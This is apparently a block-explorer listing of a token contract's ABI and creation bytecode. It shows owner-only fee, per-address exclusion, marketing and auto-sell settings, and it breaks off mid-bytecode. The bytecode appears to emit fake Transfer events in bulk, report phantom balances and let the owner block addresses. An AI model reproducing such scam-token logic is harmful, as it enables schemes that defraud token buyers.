TokenDistributor","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"allot","outputs":[{"internalType":"uint256","name":"markting","type":"uint256"},{"internalType":"uint256","name":"burn","type":"uint256"},{"internalType":"uint256","name":"addL","type":"uint256"},{"internalType":"uint256","name":"total","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"autoSell","outputs":[{"internalType":"bool","name":"status","type":"bool"},{"internalType":"uint256","name":"minPart","type":"uint256"},{"internalType":"uint256","name":"maxPart","type":"uint256"},{"internalType":"uint256","name":"parts","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"exFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"fees","outputs":[{"internalType":"uint256","name":"buy","type":"uint256"},{"internalType":"uint256","name":"sell","type":"uint256"},{"internalType":"uint256","name":"transfer","type":"uint256"},{"internalType":"uint256","name":"total","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getToken0Price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getToken1Price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"ispair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"marketingAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"marketingShare","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"num","type":"uint256"}],"name":"multiSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"recoverERC20","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"uint256","name":"markting","type":"uint256"},{"internalType":"uint256","name":"burn","type":"uint256"},{"internalType":"uint256","name":"addL","type":"uint256"},{"internalType":"uint256","name":"total","type":"uint256"}],"internalType":"struct MktCap.Allot","name":"allotConfig","type":"tuple"},{"components":[{"internalType":"bool","name":"status","type":"bool"},{"internalType":"uint256","name":"minPart","type":"uint256"},{"internalType":"uint256","name":"maxPart","type":"uint256"},{"internalType":"uint256","name":"parts","type":"uint256"}],"internalType":"struct MktCap.autoConfig","name":"sellconfig","type":"tuple"},{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256[]","name":"share","type":"uint256[]"}],"name":"setAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"uint256","name":"markting","type":"uint256"},{"internalType":"uint256","name":"burn","type":"uint256"},{"internalType":"uint256","name":"addL","type":"uint256"},{"internalType":"uint256","name":"total","type":"uint256"}],"internalType":"struct MktCap.Allot","name":"allot_","type":"tuple"}],"name":"setAllot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"bool","name":"status","type":"bool"},{"internalType":"uint256","name":"minPart","type":"uint256"},{"internalType":"uint256","name":"maxPart","type":"uint256"},{"internalType":"uint256","name":"parts","type":"uint256"}],"internalType":"struct MktCap.autoConfig","name":"autoSell_","type":"tuple"}],"name":"setAutoSellConfig","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256","name":"tf","type":"uint256"}],"name":"setExFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"uint256","name":"buy","type":"uint256"},{"internalType":"uint256","name":"sell","type":"uint256"},{"internalType":"uint256","name":"transfer","type":"uint256"},{"internalType":"uint256","name":"total","type":"uint256"}],"internalType":"struct Token.Fees","name":"fees_","type":"tuple"}],"name":"setFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256[]","name":"share","type":"uint256[]"}],"name":"setMarketing","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"setPairs","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"num","type":"uint256"}],"name":"setinb","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"baseToken","type":"address"},{"components":[{"internalType":"uint256","name":"buy","type":"uint256"},{"internalType":"uint256","name":"sell","type":"uint256"},{"internalType":"uint256","name":"transfer","type":"uint256"},{"internalType":"uint256","name":"total","type":"uint256"}],"internalType":"struct Token.Fees","name":"fees_","type":"tuple"}],"name":"start","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"}],"name":"unSetPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052601980546001600160a01b03199081167310ed43c718714eb63d5aa57b78b54704e256024e17909155601e805490911660ad1790556001601f55600a6020553480156200005057600080fd5b5060405162004cf438038062004cf483398101604081905262000073916200140b565b336019546001600160a01b0316848460036200009083826200150c565b5060046200009f82826200150c565b505050620000bc620000b6620001ba60201b60201c565b620001be565b600680546001600160a01b039384166001600160a01b0319918216179091556007805482163017905560098054929093169116179055620000fa3390565b600680546001600160a01b0319166001600160a01b0392831690811790915560408051608081018252606480825260208083018290528284018290526060909201819052601a819055601b819055601c819055601d5560009283526018905280822060049081905530808452919092209190915560195462000180921660001962000210565b600654620001b1906001600160a01b03166200019f6009600a620016eb565b620001ab9084620016fc565b6200033c565b505050620018d4565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038316620002785760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084015b60405180910390fd5b6001600160a01b038216620002db5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016200026f565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038216620003945760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016200026f565b620003a2600083836200040a565b8060026000828254620003b6919062001716565b90915550506001600160a01b0382166000818152602081815260408083208054860190555184815260008051602062004cd4833981519152910160405180910390a3620004066000838362000537565b5050565b601954600160a01b900460ff16156200042257505050565b6019805460ff60a01b1916600160a01b179055620004418383620005a9565b156200046c57604051632f78039f60e11b81526001600160a01b03841660048201526024016200026f565b6001600160a01b03831660009081526017602052604090205460ff16158015620004af57506001600160a01b03821660009081526017602052604090205460ff16155b80620004b9575080155b62000525576001600160a01b03831660009081526017602052604081205460ff1662000510576001600160a01b03831660009081526017602052604090205460ff166200050857600062000513565b600262000513565b60015b60ff1690506200052381620006a0565b505b50506019805460ff60a01b1916905550565b601954600160a01b900460ff16156200054f57505050565b6019805460ff60a01b1916600160a01b1790556001600160a01b03831615806200058057506001600160a01b038216155b62000525576200059283838362000b04565b602054156200052557602054620005259062000c73565b6001600160a01b03821660009081526018602052604081205460041480620005e957506001600160a01b0382166000908152601860205260409020546004145b15620005f8575060006200069a565b6001600160a01b038316600090815260186020526040902054600114806200063857506001600160a01b0383166000908152601860205260409020546003145b1562000647575060016200069a565b6001600160a01b038216600090815260186020526040902054600214806200068757506001600160a01b0382166000908152601860205260409020546003145b1562000696575060016200069a565b5060005b92915050565b80806002141580620006b55750600c5460ff16155b15620006bf575050565b6007546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa15801562000709573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200072f91906200172c565b600f54600d54600754604080516318160ddd60e01b81529051949550620007bf94620007b893926001600160a01b0316916318160ddd9160048083019260209291908290030181865afa1580156200078b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620007b191906200172c565b9062000d64565b9062000d79565b811015620007cc57505050565b600062000836600c60030154620007b8600c60020154600760009054906101000a90046001600160a01b03166001600160a01b03166318160ddd6040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200078b573d6000803e3d6000fd5b90508082111562000845578091505b60008080620008548562000d87565b919450925090508115620008de5760075460405163a9059cbb60e01b815261dead6004820152602481018490526001600160a01b039091169063a9059cbb906044016020604051808303816000875af1158015620008b6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620008dc919062001746565b505b8215620008f057620008f08362000df0565b6008546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa1580156200093a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200096091906200172c565b6011546012549192506000916200099591906200098e906200098490600262000d79565b6013549062000fec565b9062000fec565b90506000620009be6002620007b884620007b86010600201548862000d6460201b90919060201c565b90506000620009ce848362000fec565b9050801562000ae4576000805b60145481101562000ae15762000a1b601654620007b86015848154811062000a075762000a076200176a565b600091825260209091200154869062000d64565b600854601480549294506001600160a01b039091169163a9059cbb91908490811062000a4b5762000a4b6200176a565b60009182526020909120015460405160e083901b6001600160e01b03191681526001600160a01b039091166004820152602481018590526044016020604051808303816000875af115801562000aa5573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000acb919062001746565b508062000ad88162001780565b915050620009db565b50505b841562000af75762000af7858362000ffa565b5050505050505050505050565b6001600160a01b03831660009081526017602052604081205460ff1662000b58576001600160a01b03831660009081526017602052604090205460ff1662000b4f57601c5462000b5c565b601b5462000b5c565b601a545b601d5490915060009062000b7690620007b8858562000d64565b6001600160a01b0386166000908152601860205260409020549091506004148062000bb957506001600160a01b0384166000908152601860205260409020546004145b1562000bc3575060005b6001600160a01b03841660009081526017602052604090205460ff16801562000c4e5750836001600160a01b03166318160ddd6040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000c26573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000c4c91906200172c565b155b1562000c58575060005b801562000c6c5762000c6c84308362001198565b5050505050565b60008060005b8381101562000d5e57601e5462000c9c906001600160a01b0316600019620017b2565b601e5490935062000cb8906001600160a01b03166001620017db565b601e80546001600160a01b0319166001600160a01b0392909216918217905562000ce590600019620017b2565b601e5490925062000d01906001600160a01b03166001620017db565b601e80546001600160a01b0319166001600160a01b03928316179055601f546040519081528482169184169060008051602062004cd48339815191529060200160405180910390a38062000d558162001780565b91505062000c79565b50505050565b600062000d728284620016fc565b9392505050565b600062000d72828462001805565b60135460115460009182918291829162000da99190620007b890889062000d64565b60135460125491925060009162000dcd91600291620007b8919082908b9062000d64565b9050600062000de2836200098e898562000fec565b979296509094509092505050565b604080516002808252606082018352600092602083019080368337505060075482519293506001600160a01b03169183915060009062000e345762000e346200176a565b6001600160a01b03928316602091820292909201015260085482519116908290600190811062000e685762000e686200176a565b6001600160a01b039283166020918202929092010152600954600b54604051635c11d79560e01b815291831692635c11d7959262000eb692879260009288929091169042906004016200181c565b600060405180830381600087803b15801562000ed157600080fd5b505af115801562000ee6573d6000803e3d6000fd5b5050600854600b546040516370a0823160e01b81526001600160a01b03918216600482018190529190921693506323b872dd925090309084906370a0823190602401602060405180830381865afa15801562000f46573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000f6c91906200172c565b6040516001600160e01b031960e086901b1681526001600160a01b03938416600482015292909116602483015260448201526064016020604051808303816000875af115801562000fc1573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000fe7919062001746565b505050565b600062000d7282846200188f565b6007546040516370a0823160e01b815230600482015283916001600160a01b0316906370a0823190602401602060405180830381865afa15801562001043573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200106991906200172c565b1080620010e257506008546040516370a0823160e01b815230600482015282916001600160a01b0316906370a0823190602401602060405180830381865afa158015620010ba573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620010e091906200172c565b105b15620010ec575050565b60095460075460085460065460405162e8e33760e81b81526001600160a01b0393841660048201529183166024830152604482018690526064820185905260006084830181905260a4830152821660c48201524260e482015291169063e8e3370090610104016060604051808303816000875af115801562001172573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000c6c9190620018a5565b6001600160a01b038316620011fe5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016200026f565b6001600160a01b038216620012625760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016200026f565b6200126f8383836200040a565b6001600160a01b03831660009081526020819052604090205481811015620012e95760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016200026f565b6001600160a01b038481166000818152602081815260408083208787039055938716808352918490208054870190559251858152909260008051602062004cd4833981519152910160405180910390a362000d5e84848462000537565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200136e57600080fd5b81516001600160401b03808211156200138b576200138b62001346565b604051601f8301601f19908116603f01168101908282118183101715620013b657620013b662001346565b81604052838152602092508683858801011115620013d357600080fd5b600091505b83821015620013f75785820183015181830184015290820190620013d8565b600093810190920192909252949350505050565b6000806000606084860312156200142157600080fd5b83516001600160401b03808211156200143957600080fd5b62001447878388016200135c565b945060208601519150808211156200145e57600080fd5b506200146d868287016200135c565b925050604084015190509250925092565b600181811c908216806200149357607f821691505b602082108103620014b457634e487b7160e01b600052602260045260246000fd5b50919050565b601f82111562000fe757600081815260208120601f850160051c81016020861015620014e35750805b601f850160051c820191505b818110156200150457828155600101620014ef565b505050505050565b81516001600160401b0381111562001528576200152862001346565b62001540816200153984546200147e565b84620014ba565b602080601f8311600181146200157857600084156200155f5750858301515b600019600386901b1c1916600185901b17855562001504565b600085815260208120601f198616915b82811015620015a95788860151825594840194600190910190840162001588565b5085821015620015c85787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200162f578160001904821115620016135762001613620015d8565b808516156200162157918102915b93841c9390800290620015f3565b509250929050565b60008262001648575060016200069a565b8162001657575060006200069a565b81600181146200167057600281146200167b576200169b565b60019150506200069a565b60ff8411156200168f576200168f620015d8565b50506001821b6200069a565b5060208310610133831016604e8410600b8410161715620016c0575081810a6200069a565b620016cc8383620015ee565b8060001904821115620016e357620016e3620015d8565b029392505050565b600062000d7260ff84168362001637565b80820281158282048414176200069a576200069a620015d8565b808201808211156200069a576200069a620015d8565b6000602082840312156200173f57600080fd5b5051919050565b6000602082840312156200175957600080fd5b8151801515811462000d7257600080fd5b634e487b7160e01b600052603260045260246000fd5b600060018201620017955762001795620015d8565b5060010190565b634e487b7160e01b600052601260045260246000fd5b60006001600160a01b0383811680620017cf57620017cf6200179c565b92169190910492915050565b6001600160a01b03818116838216019080821115620017fe57620017fe620015d8565b5092915050565b6000826200181757620018176200179c565b500490565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156200186e5784516001600160a01b03168352938301939183019160010162001847565b50506001600160a01b03969096166060850152505050608001529392505050565b818103818111156200069a576200069a620015d8565b600080600060608486031215620018bb57600080fd5b8351925060208401519150604084015190509250925092565b6133f080620018e46000396000f3fe608060405260043610620002635760003560e01c806375df81a61162000147578063a457c2d711620000b9578063dd62ed3e1162000078578063dd62ed3e14620007a0578063ed4f784914620007c5578063f2fde38b14620007f6578063fc6daaaa146200081b578063fd77c960146200084057600080fd5b8063a457c2d714620006f4578063a58e0c321462000719578063a806d62e146200073e578063a9059cbb1462000763578063c4451e3e146200078857600080fd5b80638980f11f11620001065780638980f11f146200062c5780638bd2b73614620006515780638da5cb5b146200067657806395d89b4114620006965780639af1d35a14620006ae57600080fd5b806375df81a6146200057657806379cc6790146200059b5780637d3e3d1714620005c05780638187f51614620005e55780638718b24f146200060a57600080fd5b80632e6bb32111620001e15780634d7ca8ae11620001a05780634d7ca8ae14620004a25780636accdf9414620004ba5780636d49531a14620004ee57806370a082311462000539578063715018a6146200055e57600080fd5b80632e6bb32114620003f0578063313ce56714620004155780633176859a146200043357806339509351146200045857806342966c68146200047d57600080fd5b806316b19575116200022e57806316b19575146200032257806318160ddd14620003605780631d55a7dc146200038157806323b872dd14620003a657806324ec3d0f14620003cb57600080fd5b80630401208a146200027057806306fdde031462000297578063095ea7b314620002c75780630dd0cc7d14620002fd57600080fd5b366200026b57005b600080fd5b3480156200027d57600080fd5b50620002956200028f366004620029be565b62000865565b005b348015620002a457600080fd5b50620002af620008e3565b604051620002be919062002a0e565b60405180910390f35b348015620002d457600080fd5b50620002ec620002e636600462002a74565b6200097d565b6040519015158152602001620002be565b3480156200030a57600080fd5b50620002956200031c36600462002aa3565b62000999565b3480156200032f57600080fd5b50620003476200034136600462002ac6565b620009ae565b6040516001600160a01b039091168152602001620002be565b3480156200036d57600080fd5b506002545b604051908152602001620002be565b3480156200038e57600080fd5b5062000295620003a036600462002b9d565b620009d9565b348015620003b357600080fd5b50620002ec620003c536600462002bbc565b62000a01565b348015620003d857600080fd5b5062000295620003ea36600462002c1b565b62000a29565b348015620003fd57600080fd5b50620002956200040f36600462002d53565b62000a58565b3480156200042257600080fd5b5060405160098152602001620002be565b3480156200044057600080fd5b50620002956200045236600462002dee565b62000a85565b3480156200046557600080fd5b50620002ec6200047736600462002a74565b62000ce0565b3480156200048a57600080fd5b50620002956200049c36600462002ac6565b62000d08565b348015620004af57600080fd5b506200037262000d17565b348015620004c757600080fd5b50620002ec620004d936600462002dee565b60176020526000908152604090205460ff1681565b348015620004fb57600080fd5b50600c54600d54600e54600f54620005169360ff1692919084565b6040805194151585526020850193909352918301526060820152608001620002be565b3480156200054657600080fd5b50620003726200055836600462002dee565b62000e47565b3480156200056b57600080fd5b506200029562000e88565b3480156200058357600080fd5b50620002956200059536600462002e0e565b62000ea0565b348015620005a857600080fd5b5062000295620005ba36600462002a74565b62000ed6565b348015620005cd57600080fd5b5062000295620005df36600462002ac6565b62000eef565b348015620005f257600080fd5b50620002956200060436600462002dee565b62000ff1565b3480156200061757600080fd5b50600b5462000347906001600160a01b031681565b3480156200063957600080fd5b50620002956200064b36600462002a74565b620011ff565b3480156200065e57600080fd5b50620003726200067036600462002ac6565b62001327565b3480156200068357600080fd5b506005546001600160a01b031662000347565b348015620006a357600080fd5b50620002af62001349565b348015620006bb57600080fd5b50601a54601b54601c54601d54620006d39392919084565b604080519485526020850193909352918301526060820152608001620002be565b3480156200070157600080fd5b50620002ec6200071336600462002a74565b6200135a565b3480156200072657600080fd5b50620002956200073836600462002e2d565b620013db565b3480156200074b57600080fd5b50601054601154601254601354620006d39392919084565b3480156200077057600080fd5b50620002ec6200078236600462002a74565b62001551565b3480156200079557600080fd5b506200037262001561565b348015620007ad57600080fd5b5062000372620007bf36600462002e9d565b620015dd565b348015620007d257600080fd5b5062000372620007e436600462002dee565b60186020526000908152604090205481565b3480156200080357600080fd5b50620002956200081536600462002dee565b62001608565b3480156200082857600080fd5b50620002956200083a36600462002dee565b62001684565b3480156200084d57600080fd5b50620002956200085f36600462002edb565b620016af565b6200086f620016d7565b8160005b81811015620008dc57826018600087878581811062000896576200089662002efa565b9050602002016020810190620008ad919062002dee565b6001600160a01b0316815260208101919091526040016000205580620008d38162002f26565b91505062000873565b5050505050565b606060038054620008f49062002f42565b80601f0160208091040260200160405190810160405280929190818152602001828054620009229062002f42565b8015620009735780601f10620009475761010080835404028352916020019162000973565b820191906000526020600020905b8154815290600101906020018083116200095557829003601f168201915b5050505050905090565b6000336200098d81858562001733565b60019150505b92915050565b620009a3620016d7565b601f91909155602055565b60148181548110620009bf57600080fd5b6000918252602090912001546001600160a01b0316905081565b620009e3620016d7565b80516010556020810151601155604081015160125560600151601355565b60003362000a118582856200185b565b62000a1e858585620018d6565b506001949350505050565b62000a33620016d7565b62000a3e8262000a85565b62000a498262000ff1565b62000a5481620016af565b5050565b62000a62620016d7565b62000a6d85620009d9565b62000a788462000ea0565b620008dc838383620013db565b62000a8f620016d7565b6019546040805163c45a015560e01b815290516001600160a01b0390921691600091839163c45a0155916004808201926020929091908290030181865afa15801562000adf573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000b05919062002f78565b60405163e6a4390560e01b81526001600160a01b038581166004830152306024830152919091169063e6a4390590604401602060405180830381865afa15801562000b54573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000b7a919062002f78565b90506001600160a01b03811662000c6a57816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000bca573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000bf0919062002f78565b6040516364e329cb60e11b81526001600160a01b038581166004830152306024830152919091169063c9c65396906044016020604051808303816000875af115801562000c41573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000c67919062002f78565b90505b6001600160a01b03811662000cba5760405162461bcd60e51b81526020600482015260116024820152701c185a5c881a5cc81b9bdd08199bdd5b99607a1b60448201526064015b60405180910390fd5b6001600160a01b03166000908152601760205260409020805460ff191660011790555050565b6000336200098d81858562000cf68383620015dd565b62000d02919062002f98565b62001733565b62000d14338262001a95565b50565b60408051600280825260608201835260009283929190602083019080368337505060075482519293506001600160a01b03169183915060009062000d5f5762000d5f62002efa565b6001600160a01b03928316602091820292909201015260085482519116908290600190811062000d935762000d9362002efa565b6001600160a01b03928316602091820292909201015260095460405163d06ca61f60e01b815291169063d06ca61f9062000ddc90670de0b6b3a764000090859060040162002ff4565b600060405180830381865afa15801562000dfa573d6000803e3d6000fd5b505050506040513d6000823e601f3d908101601f1916820160405262000e24919081019062003017565b60018151811062000e395762000e3962002efa565b602002602001015191505090565b6001600160a01b038116600081815260208190526040812054909162000e6d5792915050565b6000811162000e7f57601f5462000e81565b805b9392505050565b62000e92620016d7565b62000e9e600062001be2565b565b62000eaa620016d7565b8051600c805460ff19169115159190911790556020810151600d556040810151600e5560600151600f55565b62000ee38233836200185b565b62000a54828262001a95565b60008060005b8381101562000feb57601e5462000f18906001600160a01b0316600019620030c7565b601e5490935062000f34906001600160a01b03166001620030f0565b601e80546001600160a01b0319166001600160a01b0392909216918217905562000f6190600019620030c7565b601e5490925062000f7d906001600160a01b03166001620030f0565b601e80546001600160a01b0319166001600160a01b03928316179055601f54604051908152848216918416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a38062000fe28162002f26565b91505062000ef5565b50505050565b62000ffb620016d7565b600880546001600160a01b0319166001600160a01b0383169081179091556040516200102790620028a4565b6001600160a01b039091168152602001604051809103906000f08015801562001054573d6000803e3d6000fd5b50600b80546001600160a01b0319166001600160a01b0392831617905560085460095460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af1158015620010c0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620010e691906200311a565b50600960009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200113b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062001161919062002f78565b60075460085460405163e6a4390560e01b81526001600160a01b039283166004820152908216602482015291169063e6a4390590604401602060405180830381865afa158015620011b6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620011dc919062002f78565b600a80546001600160a01b0319166001600160a01b039290921691909117905550565b6001600160a01b038216620012ac576006546040516000916001600160a01b03169083908381818185875af1925050503d80600081146200125d576040519150601f19603f3d011682016040523d82523d6000602084013e62001262565b606091505b5050905080620012a75760405162461bcd60e51b815260206004820152600f60248201526e1d1c985b9cd9995c8819985a5b1959608a1b604482015260640162000cb1565b505050565b60065460405163a9059cbb60e01b81526001600160a01b039182166004820152602481018390529083169063a9059cbb906044015b6020604051808303816000875af115801562001301573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620012a791906200311a565b601581815481106200133857600080fd5b600091825260209091200154905081565b606060048054620008f49062002f42565b600033816200136a8286620015dd565b905083811015620013cc5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840162000cb1565b62000a1e828686840362001733565b620013e5620016d7565b81620014295760405162461bcd60e51b815260206004820152601260248201527144414f3a43616e277420626520456d70747960701b604482015260640162000cb1565b805182146200147b5760405162461bcd60e51b815260206004820152601b60248201527f44414f3a6e756d626572206d757374206265207468652073616d650000000000604482015260640162000cb1565b6000805b8251811015620014d157620014ba838281518110620014a257620014a262002efa565b60200260200101518362001c3490919063ffffffff16565b915080620014c88162002f26565b9150506200147f565b5060008111620015245760405162461bcd60e51b815260206004820181905260248201527f44414f3a7368617265206d7573742067726561746572207468616e207a65726f604482015260640162000cb1565b6200153260148585620028b2565b508151620015489060159060208501906200291a565b50601655505050565b6000336200098d818585620018d6565b60408051600280825260608201835260009283929190602083019080368337505060085482519293506001600160a01b031691839150600090620015a957620015a962002efa565b6001600160a01b03928316602091820292909201015260075482519116908290600190811062000d935762000d9362002efa565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b62001612620016d7565b6001600160a01b038116620016795760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840162000cb1565b62000d148162001be2565b6200168e620016d7565b6001600160a01b03166000908152601760205260409020805460ff19169055565b620016b9620016d7565b8035601a556020810135601b556040810135601c5560600135601d55565b6005546001600160a01b0316331462000e9e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000cb1565b6001600160a01b038316620017975760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840162000cb1565b6001600160a01b038216620017fa5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840162000cb1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000620018698484620015dd565b9050600019811462000feb5781811015620018c75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640162000cb1565b62000feb848484840362001733565b6001600160a01b0383166200193c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2074